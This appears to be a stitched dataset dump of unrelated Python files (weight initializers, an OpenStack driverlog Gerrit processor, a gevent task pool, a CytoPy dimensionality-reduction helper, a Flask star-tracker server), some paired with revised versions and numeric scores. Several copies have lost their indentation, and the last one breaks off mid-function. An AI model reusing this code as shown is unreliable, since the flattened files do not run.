pass
def __call__(self, shape, name=None):
r = np_rng.normal(loc=0, scale=0.01, size=shape)
r = r/np.sqrt(np.sum(r**2))*np.sqrt(shape[1])
return sharedX(r, name=name)
class Constant(object):
def __init__(self, c=0.):
self.c = c
def __call__(self, shape):
return sharedX(np.ones(shape) * self.c)
class Identity(object):
def __init__(self, scale=0.25):
self.scale = scale
def __call__(self, shape):
return sharedX(np.identity(shape[0]) * self.scale)
class ReluInit(object):
def __init__(self):
pass
def __call__(self, shape):
if len(shape) == 2:
scale = np.sqrt(2./shape[0])
elif len(shape) == 4:
scale = np.sqrt(2./np.prod(shape[1:]))
else:
raise NotImplementedError
return sharedX(np_rng.normal(size=shape, scale=scale)) | 0.535827 | 0.168207 |
import re
import memcache
from oslo.config import cfg
from six.moves.urllib import parse
from driverlog.openstack.common import log as logging
from driverlog.processor import config
from driverlog.processor import rcs
from driverlog.processor import utils
LOG = logging.getLogger(__name__)
def update_generator(memcached, default_data, ci_ids_map, force_update=False):
for project in default_data['projects']:
project_id = project['id']
rcs_inst = rcs.get_rcs(project_id, cfg.CONF.review_uri)
rcs_inst.setup(key_filename=cfg.CONF.ssh_key_filename,
username=cfg.CONF.ssh_username)
LOG.debug('Processing reviews for project: %s', project_id)
rcs_key = 'rcs:' + parse.quote_plus(project_id)
last_id = None
if not force_update:
last_id = memcached.get(rcs_key)
review_iterator = rcs_inst.log(last_id)
branch_ci_set = set()
for review in review_iterator:
review_url = review['url']
branch = review['branch']
for approval in review['currentPatchSet']['approvals']:
if approval['type'] != 'VRIF':
continue
ci = approval['by']['username']
if ci not in ci_ids_map:
continue
branch_ci = (branch, ci)
if branch_ci in branch_ci_set:
continue # already seen, ignore
branch_ci_set.add(branch_ci)
patch_number = review['currentPatchSet']['number']
message = ''
for comment in reversed(review['comments']):
prefix = 'Patch Set %s:' % patch_number
if ((comment['reviewer']['username'] == ci) and
(comment['message'].find(prefix) == 0)):
message = comment['message'][len(prefix):].strip()
break
success = approval['value'] in ['1', '2']
vendor = ci_ids_map[ci][0]
driver_name = ci_ids_map[ci][1]
yield {
(project_id.lower(), vendor.lower(),
driver_name.lower()): {
'os_versions_map': {
branch: {
'project_id': project_id,
'vendor': vendor,
'name': driver_name,
'verification': 'external_ci_verification',
'success': success,
'comment': message,
'timestamp': approval['grantedOn'],
'review_url': review_url
}
}
}
}
last_id = rcs_inst.get_last_id()
LOG.debug('RCS last id is: %s', last_id)
memcached.set(rcs_key, last_id)
def main():
# init conf and logging
conf = cfg.CONF
conf.register_cli_opts(config.OPTS)
conf.register_opts(config.OPTS)
conf()
logging.setup('driverlog')
LOG.info('Logging enabled')
MEMCACHED_URI_PREFIX = r'^memcached:\/\/'
stripped = re.sub(MEMCACHED_URI_PREFIX, '', cfg.CONF.runtime_storage_uri)
if not stripped:
exit(1)
memcached_uri = stripped.split(',')
memcached = memcache.Client(memcached_uri)
default_data = utils.read_json_from_uri(cfg.CONF.default_data_uri)
if not default_data:
LOG.critical('Unable to load default data')
return not 0
ci_ids_map = {}
for driver in default_data['drivers']:
vendor = driver['vendor']
driver_name = driver['name']
for os_version in driver['os_versions']:
if os_version['verification'] == 'external_ci_verification':
ci_id = os_version['ci_id']
ci_ids_map[ci_id] = (vendor, driver_name)
persisted_data = {}
if not cfg.CONF.force_update:
persisted_data = memcached.get('driverlog:update') or {}
for record in update_generator(memcached, default_data, ci_ids_map,
force_update=cfg.CONF.force_update):
LOG.info('Got new record from Gerrit: %s', record)
key = record.keys()[0]
if key not in persisted_data:
persisted_data.update(record)
else:
persisted_os_versions = persisted_data[key]['os_versions_map']
for os_version, info in record[key]['os_versions_map'].iteritems():
if os_version not in persisted_os_versions:
persisted_os_versions[os_version] = info
else:
persisted_os_versions[os_version].update(info)
memcached.set('driverlog:update', persisted_data)
if __name__ == '__main__':
main() | driverlog/processor/main.py |
import re
import memcache
from oslo.config import cfg
from six.moves.urllib import parse
from driverlog.openstack.common import log as logging
from driverlog.processor import config
from driverlog.processor import rcs
from driverlog.processor import utils
LOG = logging.getLogger(__name__)
def update_generator(memcached, default_data, ci_ids_map, force_update=False):
for project in default_data['projects']:
project_id = project['id']
rcs_inst = rcs.get_rcs(project_id, cfg.CONF.review_uri)
rcs_inst.setup(key_filename=cfg.CONF.ssh_key_filename,
username=cfg.CONF.ssh_username)
LOG.debug('Processing reviews for project: %s', project_id)
rcs_key = 'rcs:' + parse.quote_plus(project_id)
last_id = None
if not force_update:
last_id = memcached.get(rcs_key)
review_iterator = rcs_inst.log(last_id)
branch_ci_set = set()
for review in review_iterator:
review_url = review['url']
branch = review['branch']
for approval in review['currentPatchSet']['approvals']:
if approval['type'] != 'VRIF':
continue
ci = approval['by']['username']
if ci not in ci_ids_map:
continue
branch_ci = (branch, ci)
if branch_ci in branch_ci_set:
continue # already seen, ignore
branch_ci_set.add(branch_ci)
patch_number = review['currentPatchSet']['number']
message = ''
for comment in reversed(review['comments']):
prefix = 'Patch Set %s:' % patch_number
if ((comment['reviewer']['username'] == ci) and
(comment['message'].find(prefix) == 0)):
message = comment['message'][len(prefix):].strip()
break
success = approval['value'] in ['1', '2']
vendor = ci_ids_map[ci][0]
driver_name = ci_ids_map[ci][1]
yield {
(project_id.lower(), vendor.lower(),
driver_name.lower()): {
'os_versions_map': {
branch: {
'project_id': project_id,
'vendor': vendor,
'name': driver_name,
'verification': 'external_ci_verification',
'success': success,
'comment': message,
'timestamp': approval['grantedOn'],
'review_url': review_url
}
}
}
}
last_id = rcs_inst.get_last_id()
LOG.debug('RCS last id is: %s', last_id)
memcached.set(rcs_key, last_id)
def main():
# init conf and logging
conf = cfg.CONF
conf.register_cli_opts(config.OPTS)
conf.register_opts(config.OPTS)
conf()
logging.setup('driverlog')
LOG.info('Logging enabled')
MEMCACHED_URI_PREFIX = r'^memcached:\/\/'
stripped = re.sub(MEMCACHED_URI_PREFIX, '', cfg.CONF.runtime_storage_uri)
if not stripped:
exit(1)
memcached_uri = stripped.split(',')
memcached = memcache.Client(memcached_uri)
default_data = utils.read_json_from_uri(cfg.CONF.default_data_uri)
if not default_data:
LOG.critical('Unable to load default data')
return not 0
ci_ids_map = {}
for driver in default_data['drivers']:
vendor = driver['vendor']
driver_name = driver['name']
for os_version in driver['os_versions']:
if os_version['verification'] == 'external_ci_verification':
ci_id = os_version['ci_id']
ci_ids_map[ci_id] = (vendor, driver_name)
persisted_data = {}
if not cfg.CONF.force_update:
persisted_data = memcached.get('driverlog:update') or {}
for record in update_generator(memcached, default_data, ci_ids_map,
force_update=cfg.CONF.force_update):
LOG.info('Got new record from Gerrit: %s', record)
key = record.keys()[0]
if key not in persisted_data:
persisted_data.update(record)
else:
persisted_os_versions = persisted_data[key]['os_versions_map']
for os_version, info in record[key]['os_versions_map'].iteritems():
if os_version not in persisted_os_versions:
persisted_os_versions[os_version] = info
else:
persisted_os_versions[os_version].update(info)
memcached.set('driverlog:update', persisted_data)
if __name__ == '__main__':
main() | 0.207295 | 0.063978 |
# __author__ = 'kute'
# __mtime__ = '2016/12/24 20:45'
"""
多线程,协称 执行器
"""
import os
import attr
import gevent
from gevent import monkey
from gevent.pool import Pool
monkey.patch_all()
def valide_func(instance, attribute, value):
if not callable(value):
raise TypeError("{} is not callable")
@attr.s
class Eventor(object):
func = attr.ib(validator=valide_func)
taskunitcount = attr.ib(default=100, convert=int)
threadcount = attr.ib(default=os.cpu_count() * 5, convert=int)
interval = attr.ib(default=0, convert=int)
def _slice_list_by_size(self, tasklist, slicesize):
"""按指定大小分隔集合
"""
size = len(tasklist)
if size <= slicesize:
yield tasklist
else:
for i in list(range(0, size // slicesize + 1)):
posi = i * slicesize
templist = tasklist[posi: posi + slicesize]
if len(templist) > 0:
yield templist
def _run(self, pool, tasklist, async=False):
if async:
return pool.map_async(self.func, tasklist)
else:
return pool.map(self.func, tasklist)
def run_with_tasklist(self, tasklist=None, async=False, timeout=None):
if not tasklist or len(tasklist) == 0:
raise ValueError("parameters tasklist null value")
if not isinstance(tasklist, list):
raise ValueError("parameters tasklist wrong type, should be list, not {}".format(tasklist.__class__.__name__))
if not callable(self.func):
raise ValueError("func is illegal function")
if async and timeout is None:
raise ValueError("timeout should be seted if special async=True")
threadcount = self.threadcount or os.cpu_count() * 5
taskunitcount = self.taskunitcount or 100
pool = Pool(threadcount)
size = len(tasklist)
total = 0
resultlist = []
if size <= taskunitcount:
result = self._run(pool, tasklist, async)
resultlist.extend(result.get(timeout) if async else result)
print("finished {} total tasks".format(size))
else:
for slicelist in self._slice_list_by_size(tasklist, taskunitcount):
result = self._run(pool, slicelist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(slicelist)
gevent.sleep(self.interval)
print("finished {} total tasks".format(total))
pool.join()
return resultlist
def run_with_file(self, file=None, async=False, timeout=None):
if not os.path.exists(file) or not os.path.isfile(file):
raise ValueError("wrong file or not exists")
if not callable(self.func):
raise ValueError("func is illegal function")
if async and timeout is None:
raise ValueError("timeout should be seted if special async=True")
threadcount = self.threadcount or os.cpu_count() * 5
taskunitcount = self.taskunitcount or 100
pool = Pool(threadcount)
plist = []
total = 0
resultlist = []
with open(file, "r") as f:
for line in f:
plist.append(line.strip())
if len(plist) >= taskunitcount:
result = self._run(pool, plist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(plist)
plist.clear()
gevent.sleep(self.interval)
if len(plist) > 0:
result = self._run(pool, plist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(plist)
plist.clear()
print("finished {} total tasks".format(total))
pool.join()
return resultlist | eventor/core.py |
# __author__ = 'kute'
# __mtime__ = '2016/12/24 20:45'
"""
多线程,协称 执行器
"""
import os
import attr
import gevent
from gevent import monkey
from gevent.pool import Pool
monkey.patch_all()
def valide_func(instance, attribute, value):
if not callable(value):
raise TypeError("{} is not callable")
@attr.s
class Eventor(object):
func = attr.ib(validator=valide_func)
taskunitcount = attr.ib(default=100, convert=int)
threadcount = attr.ib(default=os.cpu_count() * 5, convert=int)
interval = attr.ib(default=0, convert=int)
def _slice_list_by_size(self, tasklist, slicesize):
"""按指定大小分隔集合
"""
size = len(tasklist)
if size <= slicesize:
yield tasklist
else:
for i in list(range(0, size // slicesize + 1)):
posi = i * slicesize
templist = tasklist[posi: posi + slicesize]
if len(templist) > 0:
yield templist
def _run(self, pool, tasklist, async=False):
if async:
return pool.map_async(self.func, tasklist)
else:
return pool.map(self.func, tasklist)
def run_with_tasklist(self, tasklist=None, async=False, timeout=None):
if not tasklist or len(tasklist) == 0:
raise ValueError("parameters tasklist null value")
if not isinstance(tasklist, list):
raise ValueError("parameters tasklist wrong type, should be list, not {}".format(tasklist.__class__.__name__))
if not callable(self.func):
raise ValueError("func is illegal function")
if async and timeout is None:
raise ValueError("timeout should be seted if special async=True")
threadcount = self.threadcount or os.cpu_count() * 5
taskunitcount = self.taskunitcount or 100
pool = Pool(threadcount)
size = len(tasklist)
total = 0
resultlist = []
if size <= taskunitcount:
result = self._run(pool, tasklist, async)
resultlist.extend(result.get(timeout) if async else result)
print("finished {} total tasks".format(size))
else:
for slicelist in self._slice_list_by_size(tasklist, taskunitcount):
result = self._run(pool, slicelist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(slicelist)
gevent.sleep(self.interval)
print("finished {} total tasks".format(total))
pool.join()
return resultlist
def run_with_file(self, file=None, async=False, timeout=None):
if not os.path.exists(file) or not os.path.isfile(file):
raise ValueError("wrong file or not exists")
if not callable(self.func):
raise ValueError("func is illegal function")
if async and timeout is None:
raise ValueError("timeout should be seted if special async=True")
threadcount = self.threadcount or os.cpu_count() * 5
taskunitcount = self.taskunitcount or 100
pool = Pool(threadcount)
plist = []
total = 0
resultlist = []
with open(file, "r") as f:
for line in f:
plist.append(line.strip())
if len(plist) >= taskunitcount:
result = self._run(pool, plist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(plist)
plist.clear()
gevent.sleep(self.interval)
if len(plist) > 0:
result = self._run(pool, plist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(plist)
plist.clear()
print("finished {} total tasks".format(total))
pool.join()
return resultlist | 0.242385 | 0.075824 |
from sklearn.manifold import TSNE
from sklearn.decomposition import PCA, KernelPCA
from umap import UMAP
import numpy as np
import pandas as pd
import phate
def dimensionality_reduction(data: pd.DataFrame,
features: list,
method: str,
n_components: int,
return_embeddings_only: bool = False,
return_reducer: bool = False,
**kwargs) -> pd.DataFrame or np.array:
"""
Perform dimensionality reduction using either UMAP, PCA, tSNE, or PHATE. PCA and tSNE are implemented using
the Scikit-Learn machine learning library.
Documentation for UMAP can be found here: https://umap-learn.readthedocs.io/en/latest/
Documentation for PHATE can be found here: https://phate.readthedocs.io/en/stable/
Parameters
-----------
data: Pandas.DataFrame
Events to perform dim reduction on
features: list
column names for feature space
method: str
method to use; either UMAP, PCA, tSNE, or PHATE
n_components: int
number of components to generate
return_embeddings_only: bool, (default=True)
if True, the embeddings are returned as a numpy array, otherwise original dataframe
is returned modified with new columns, one for each embedding (column name of format {Method}_{i}
where i = 0 to n_components)
return_reducer: bool, (default=False)
If True, returns instance of dimensionality reduction object
kwargs:
keyword arguments to pass to chosen dim reduction method
Returns
--------
(Pandas.DataFrame or Numpy.array) or (Pandas.DataFrame or Numpy.array, Reducer)
Embeddings as numpy array or original DataFrame with new columns for embeddings
"""
data = data.copy()
if method == 'UMAP':
reducer = UMAP(random_state=42, n_components=n_components, **kwargs)
elif method == 'PCA':
reducer = PCA(random_state=42, n_components=n_components, **kwargs)
elif method == 'tSNE':
reducer = TSNE(random_state=42, n_components=n_components, **kwargs)
elif method == 'PHATE':
reducer = phate.PHATE(random_state=42, n_jobs=-2, n_components=n_components, **kwargs)
elif method == 'KernelPCA':
reducer = KernelPCA(random_state=42, n_components=n_components, **kwargs)
else:
raise ValueError("Error: invalid method given for plot clusters, "
"must be one of: 'UMAP', 'tSNE', 'PCA', 'PHATE', 'KernelPCA'")
embeddings = reducer.fit_transform(data[features])
if return_embeddings_only:
return embeddings
for i, e in enumerate(embeddings.T):
data[f'{method}_{i}'] = e
if return_reducer:
return data, reducer
return data | CytoPy/flow/dim_reduction.py | from sklearn.manifold import TSNE
from sklearn.decomposition import PCA, KernelPCA
from umap import UMAP
import numpy as np
import pandas as pd
import phate
def dimensionality_reduction(data: pd.DataFrame,
                             features: list,
                             method: str,
                             n_components: int,
                             return_embeddings_only: bool = False,
                             return_reducer: bool = False,
                             **kwargs) -> pd.DataFrame or np.array:
    """
    Perform dimensionality reduction using UMAP, PCA, tSNE, PHATE or KernelPCA.
    PCA, KernelPCA and tSNE are implemented using the Scikit-Learn machine learning library.
    Documentation for UMAP can be found here: https://umap-learn.readthedocs.io/en/latest/
    Documentation for PHATE can be found here: https://phate.readthedocs.io/en/stable/
    Parameters
    -----------
    data: Pandas.DataFrame
        Events to perform dim reduction on
    features: list
        column names for feature space
    method: str
        method to use; one of 'UMAP', 'PCA', 'tSNE', 'PHATE' or 'KernelPCA'
    n_components: int
        number of components to generate
    return_embeddings_only: bool, (default=False)
        if True, the embeddings are returned as a numpy array, otherwise original dataframe
        is returned modified with new columns, one for each embedding (column name of format {Method}_{i}
        where i = 0 to n_components)
    return_reducer: bool, (default=False)
        If True, returns instance of dimensionality reduction object (only honoured when
        return_embeddings_only is False)
    kwargs:
        keyword arguments to pass to chosen dim reduction method
    Returns
    --------
    (Pandas.DataFrame or Numpy.array) or (Pandas.DataFrame or Numpy.array, Reducer)
        Embeddings as numpy array or original DataFrame with new columns for embeddings
    """
    data = data.copy()
    # Dispatch table; construction is deferred via lambdas so only the requested
    # reducer is ever built. random_state fixed for reproducibility.
    reducers = {
        'UMAP': lambda: UMAP(random_state=42, n_components=n_components, **kwargs),
        'PCA': lambda: PCA(random_state=42, n_components=n_components, **kwargs),
        'tSNE': lambda: TSNE(random_state=42, n_components=n_components, **kwargs),
        'PHATE': lambda: phate.PHATE(random_state=42, n_jobs=-2, n_components=n_components, **kwargs),
        'KernelPCA': lambda: KernelPCA(random_state=42, n_components=n_components, **kwargs),
    }
    if method not in reducers:
        # Previous message referred to "plot clusters", which is a different function.
        raise ValueError("Error: invalid method given for dimensionality reduction, "
                         "must be one of: 'UMAP', 'tSNE', 'PCA', 'PHATE', 'KernelPCA'")
    reducer = reducers[method]()
    embeddings = reducer.fit_transform(data[features])
    if return_embeddings_only:
        return embeddings
    # One new column per embedding dimension, named '<method>_<i>'.
    for i, component in enumerate(embeddings.T):
        data[f'{method}_{i}'] = component
    if return_reducer:
        return data, reducer
    return data
import base64
import time
import zipfile
import os
import uuid
import logging
from io import BytesIO
from pathlib import Path
import cv2
from flask import render_template, jsonify, request, send_file
from server import app, catalog
from server.cam import Cam
from server.metrics import Metrics
from server.sensors import DS1621, LSM303, CPU_SENSOR
from server.db import Db
from server.startracker.image import ImageUtils
# Shared camera handle; routes serialise access via lock_acquire()/lock_release().
CAM = Cam()
# Current file Path
FILE_PATH = Path(__file__).parent.absolute()
# SQLite-backed store (see server.db.Db) holding queued bursts, next to this module.
DB = Db(f"{FILE_PATH}/data/startrackerpy.db")
@app.route("/")
def index():
    """ Render and return the main index page (index.html).
    """
    return render_template('index.html')
@app.route("/current-frame")
def current_frame():
    """ Returns a base64 string with the data of an image.
    The image is taken when the function is called.

    Query params brightness, gamma, gain, exposure (all ints) are applied
    to the camera first.  The frame is converted to grayscale, saved to
    data/images/<uuid>.jpg, and returned JPEG-encoded as base64 JSON:
    {'b64_img': ..., 'uuid': '<uuid>.jpg'}.
    """
    images_path = f"{FILE_PATH}/data/images"
    # Get camera parameters
    cam_params = {
        'brightness': int(request.args.get('brightness')),
        'gamma': int(request.args.get('gamma')),
        'gain': int(request.args.get('gain')),
        'exposure': int(request.args.get('exposure')),
    }
    # Hold the camera lock for the whole configure-then-capture sequence.
    CAM.lock_acquire()
    CAM.set_camera_params(cam_params)
    # Give the camera time to apply the new parameters (cf. current_frame_tiff).
    time.sleep(1)
    _, frame = CAM.read()
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    CAM.lock_release()
    Path(images_path).mkdir(parents=True, exist_ok=True)
    # uuid1 is time-based, so each capture gets a unique filename.
    uid = uuid.uuid1()
    _, im_arr = cv2.imencode('.jpg', frame)
    cv2.imwrite(f"{images_path}/{uid}.jpg", frame)
    im_bytes = im_arr.tobytes()
    im_b64 = base64.b64encode(im_bytes).decode("ascii")
    return jsonify({
        'b64_img': im_b64,
        'uuid': f"{uid}.jpg",
    })
@app.route("/current-frame-tiff")
def current_frame_tiff():
    """ Capture a single frame and write it to 'test.tiff'; returns "Done".

    NOTE(review): looks like a debugging endpoint — the output filename is
    fixed and relative to the process working directory, and the previous
    docstring (claiming a base64 return) was copy-pasted from current_frame.
    """
    # Get camera parameters
    cam_params = {
        'brightness': int(request.args.get('brightness')),
        'gamma': int(request.args.get('gamma')),
        'gain': int(request.args.get('gain')),
        'exposure': int(request.args.get('exposure')),
    }
    CAM.lock_acquire()
    CAM.set_camera_params(cam_params)
    # Give some time to set the camera parameters
    time.sleep(1.5)
    _, frame = CAM.read()
    # Fixed name, written into the current working directory.
    cv2.imwrite('test.tiff', frame)
    CAM.lock_release()
    return "Done"
@app.route("/get-camera-params")
def get_camera_params():
    """Return the camera's current parameter set as JSON."""
    return jsonify(CAM.get_camera_params())
@app.route("/get-metrics/<minutes>")
def get_metrics(minutes):
    """Return metrics from influxdb covering the last *minutes* minutes as JSON."""
    return jsonify(Metrics.get_metrics(from_time=int(minutes)))
@app.route("/queue-burst")
def queue_burst():
    """ Queue a burst of images.

    Query params: duration and interval (used to compute the frame count)
    plus the camera settings brightness, gamma, gain, exposure.
    Returns JSON {'result', 'id', 'msg'}; 'id' is -1 on error.
    """
    duration = request.args.get('duration')
    interval = request.args.get('interval')
    brightness = int(request.args.get('brightness'))
    gamma = int(request.args.get('gamma'))
    gain = int(request.args.get('gain'))
    exposure = int(request.args.get('exposure'))
    # Guard: a zero/negative interval previously crashed with
    # ZeroDivisionError (HTTP 500) instead of reporting an error.
    if int(interval) <= 0:
        return jsonify({
            'result': 'error',
            'id': -1,
            'msg': 'Interval must be a positive number'
        })
    if int(duration) / int(interval) > 600:
        return jsonify({
            'result': 'error',
            'id': -1,
            # Typo fixed: "numer" -> "number".
            'msg': 'Maximum number of frames(600) exceeded'
        })
    # Add a row to queue the burst
    row_id = DB.insert_burst(duration, interval, brightness, gamma,
                             gain, exposure)
    return jsonify({
        'result': 'ok',
        'id': row_id,
        'msg': 'The burst has been queued'
    })
@app.route("/get-bursts")
def get_bursts():
    """Render the bursts stored in the DB as an HTML table (bursts.html)."""
    return render_template('bursts.html', bursts=DB.get_bursts())
@app.route("/download-burst")
def download_burst():
    """Build an in-memory zip of every frame of a burst and send it.

    Query params: burstId (int) and format ("tiff" or "jpeg").  Frames are
    read from server/data/bursts (relative to the process CWD) and streamed
    back as burst_<id>_<format>.zip.

    NOTE(review): `attachment_filename` was renamed `download_name` in
    Flask 2.0 — confirm the Flask version this project pins.
    """
    images_path = "server/data/bursts"
    burst_id = int(request.args.get('burstId'))
    burst_format = request.args.get('format')
    burst = DB.get_burst(burst_id)
    # Number of frames the burst produced.
    files = int(burst['duration'] / burst['interval'])
    memory_file = BytesIO()
    with zipfile.ZipFile(memory_file, 'w') as zf:
        for i in range(1, files+1):
            image_name = "{}/{}_{}.tiff".format(images_path, burst_id, i)
            if burst_format == "jpeg":
                # Decode and re-encode as JPEG when requested.
                image_data = cv2.imread(image_name)
                _, encoded = cv2.imencode(".jpeg", image_data)
                image_bytes = encoded.tobytes()
            else:
                # Bug fix: the previous code zipped ndarray.tobytes() (the raw
                # pixel buffer), which is not a valid TIFF file.  Ship the
                # original file contents unchanged instead.
                with open(image_name, "rb") as fh:
                    image_bytes = fh.read()
            data = zipfile.ZipInfo("{}_{}.{}".format(burst_id, i, burst_format))
            data.date_time = time.localtime(time.time())[:6]
            data.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(data, image_bytes)
    memory_file.seek(0)
    attachment_name = "burst_{}_{}.zip".format(burst_id, burst_format)
    return send_file(memory_file, attachment_filename=attachment_name,
                     as_attachment=True)
@app.route("/delete-burst")
def delete_burst():
    """Delete the burst id given as parameter, including all the
    images taken by that burst.

    Missing/unremovable files are reported but do not abort the cleanup;
    the DB row is removed afterwards either way.
    """
    images_path = "server/data/bursts"
    burst_id = int(request.args.get('burstId'))
    burst = DB.get_burst(burst_id)
    files = int(burst['duration'] / burst['interval'])
    for i in range(1, files+1):
        image_name = "{}/{}_{}.tiff".format(images_path, burst_id, i)
        try:
            os.remove(image_name)
        except OSError as e:
            # Narrowed from bare `Exception`: only file-system errors are
            # expected here; anything else should surface.
            print(e)
    DB.delete_burst(burst_id)
    return "Done"
@app.route("/upload-image", methods=["POST"])
def upload_image():
    """Save the image uploaded by the user and return its base64 string
    to show it in the DOM.

    Expects a multipart field named 'image'.  The file is stored under
    data/images/<uuid>.<ext> and echoed back JPEG-encoded as base64 JSON.
    Returns HTTP 400 for filenames without an extension or for files
    OpenCV cannot decode (both previously crashed with HTTP 500).
    """
    images_path = f"{FILE_PATH}/data/images"
    Path(images_path).mkdir(parents=True, exist_ok=True)
    image = request.files['image']
    name_parts = image.filename.rsplit(".", 1)
    # Guard: an extension-less filename used to raise IndexError.
    if len(name_parts) != 2 or not name_parts[1]:
        return jsonify({'error': 'Uploaded filename needs an extension'}), 400
    image_ext = name_parts[1]
    uid = uuid.uuid1()
    image.save(f"{images_path}/{uid}.{image_ext}")
    saved_image = cv2.imread(f"{images_path}/{uid}.{image_ext}")
    # cv2.imread returns None for files it cannot decode.
    if saved_image is None:
        return jsonify({'error': 'Uploaded file is not a readable image'}), 400
    _, im_arr = cv2.imencode('.jpg', saved_image)
    im_bytes = im_arr.tobytes()
    img_b64 = base64.b64encode(im_bytes).decode("ascii")
    return jsonify({
        'b64_img': img_b64,
        'uuid': f"{uid}.{image_ext}",
    })
def _encode_jpg_b64(img):
    """JPEG-encode *img* (an OpenCV ndarray) and return it as ascii base64."""
    _, im_arr = cv2.imencode('.jpg', img)
    return base64.b64encode(im_arr.tobytes()).decode("ascii")


@app.route("/process-image")
def process_image():
    """Process the given image to find stars and return the image with
    the associated data.

    Query params: uuid (stored image name), auto_threshold,
    threshold (int, used when auto_threshold != "true"), label_guide_stars.
    The JSON response carries base64 images, the grayscale histogram and a
    'results' dict of user-facing messages.
    """
    auto_threshold = request.args.get('auto_threshold')
    label_guide_stars = request.args.get('label_guide_stars')
    images_path = f"{FILE_PATH}/data/images"
    response = {'results': {}}
    uid = request.args.get('uuid')
    image = cv2.imread(f"{images_path}/{uid}")
    gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    blurred = cv2.GaussianBlur(gray_img, (3, 3), 0)
    # NOTE(review): debug logging of the raw query param, kept as-is.
    logging.warning(auto_threshold)
    if auto_threshold == "true":
        threshold = ImageUtils.get_threshold(blurred, 170)
        msg = {'type': 'info', 'msg': f'Automatic threshold selected: {threshold}'}
    else:
        threshold = int(request.args.get('threshold'))
        msg = {'type': 'info', 'msg': f'Threshold selected by user input: {threshold}'}
    response['results']['threshold'] = msg
    # Get the threshold image and send it back base64-encoded.
    thresh_image = cv2.threshold(blurred, threshold, 255, cv2.THRESH_BINARY)[1]
    response['b64_thresh_img'] = _encode_jpg_b64(thresh_image)
    # Get possible image stars
    stars = ImageUtils.get_image_stars(thresh_image, gray_img)
    # Pattern matching needs at least 4 candidate stars.
    pattern = []
    if len(stars) >= 4:
        pattern = catalog.find_stars_pattern(stars[0:4], err=0.010)
        response['b64_img'] = _encode_jpg_b64(image)
    # Both branches previously built this identical message; do it once.
    response['results']['stars'] = {
        'type': 'info', 'msg': f'Possible stars found in the image: {len(stars)}'}
    # Histogram of the blurred grayscale image (256 bins over 0..255).
    hist = cv2.calcHist([blurred], [0], None, [256], [0, 256])
    response['hist'] = hist.tolist()
    # If a pattern was found
    if len(pattern) > 0:
        response['pattern'] = True
        # Get original image with pattern drawn
        ImageUtils.draw_pattern(image, pattern[0])
        # Optionally label extra guide stars on top of the pattern.
        if label_guide_stars == "true":
            labeled = ImageUtils.draw_guide_stars(image, stars, pattern[0], max=10)
            msg = {'type': 'info', 'msg': f'Extra guide stars labeled: {labeled}'}
            response['results']['labeled'] = msg
        response['pattern_points'] = _encode_jpg_b64(image)
        msg = {'type': 'success', 'msg': f'Pattern found: {pattern[1]}'}
    else:
        # Plain string: the previous f-string had no placeholders.
        msg = {'type': 'Error', 'msg': 'Pattern not found'}
    response['results']['pattern'] = msg
    return jsonify(response)
import time
import zipfile
import os
import uuid
import logging
from io import BytesIO
from pathlib import Path
import cv2
from flask import render_template, jsonify, request, send_file
from server import app, catalog
from server.cam import Cam
from server.metrics import Metrics
from server.sensors import DS1621, LSM303, CPU_SENSOR
from server.db import Db
from server.startracker.image import ImageUtils
CAM = Cam()
# Current file Path
FILE_PATH = Path(__file__).parent.absolute()
DB = Db(f"{FILE_PATH}/data/startrackerpy.db")
@app.route("/")
def index():
""" Returns the index html template
"""
return render_template('index.html')
@app.route("/current-frame")
def current_frame():
""" Returns a base64 string with the data of an image.
The image is taken when the function is called.
"""
images_path = f"{FILE_PATH}/data/images"
# Get camera parameters
cam_params = {
'brightness': int(request.args.get('brightness')),
'gamma': int(request.args.get('gamma')),
'gain': int(request.args.get('gain')),
'exposure': int(request.args.get('exposure')),
}
CAM.lock_acquire()
CAM.set_camera_params(cam_params)
time.sleep(1)
_, frame = CAM.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
CAM.lock_release()
Path(images_path).mkdir(parents=True, exist_ok=True)
uid = uuid.uuid1()
_, im_arr = cv2.imencode('.jpg', frame)
cv2.imwrite(f"{images_path}/{uid}.jpg", frame)
im_bytes = im_arr.tobytes()
im_b64 = base64.b64encode(im_bytes).decode("ascii")
return jsonify({
'b64_img': im_b64,
'uuid': f"{uid}.jpg",
})
@app.route("/current-frame-tiff")
def current_frame_tiff():
""" Returns a base64 string with the data of an image.
The image is taken when the function is called.
"""
# Get camera parameters
cam_params = {
'brightness': int(request.args.get('brightness')),
'gamma': int(request.args.get('gamma')),
'gain': int(request.args.get('gain')),
'exposure': int(request.args.get('exposure')),
}
CAM.lock_acquire()
CAM.set_camera_params(cam_params)
# Give some time to set the camera parameters
time.sleep(1.5)
_, frame = CAM.read()
cv2.imwrite('test.tiff', frame)
CAM.lock_release()
return "Done"
@app.route("/get-camera-params")
def get_camera_params():
""" Returns a JSON with the current parameters of the camera.
"""
params = CAM.get_camera_params()
return jsonify(params)
@app.route("/get-metrics/<minutes>")
def get_metrics(minutes):
""" Returns metrics from influxdb for the last
X minutes.
"""
metrics = Metrics.get_metrics(from_time=int(minutes))
return jsonify(metrics)
@app.route("/queue-burst")
def queue_burst():
""" Queues a burst of images.
"""
duration = request.args.get('duration')
interval = request.args.get('interval')
brightness = int(request.args.get('brightness'))
gamma = int(request.args.get('gamma'))
gain = int(request.args.get('gain'))
exposure = int(request.args.get('exposure'))
if int(duration) / int(interval) > 600:
return jsonify({
'result': 'error',
'id': -1,
'msg': 'Maximum numer of frames(600) exceeded'
})
# Add a row to queue the burst
row_id = DB.insert_burst(duration, interval, brightness, gamma,
gain, exposure)
return jsonify({
'result': 'ok',
'id': row_id,
'msg': 'The burst has been queued'
})
@app.route("/get-bursts")
def get_bursts():
"""Returns an html table with the burst retrieved from the DB.
"""
bursts = DB.get_bursts()
return render_template('bursts.html', bursts=bursts)
@app.route("/download-burst")
def download_burst():
"""Returns an html table with the burst retrieved from the DB.
"""
images_path = "server/data/bursts"
burst_id = int(request.args.get('burstId'))
burst_format = request.args.get('format')
burst = DB.get_burst(burst_id)
files = int(burst['duration'] / burst['interval'])
memory_file = BytesIO()
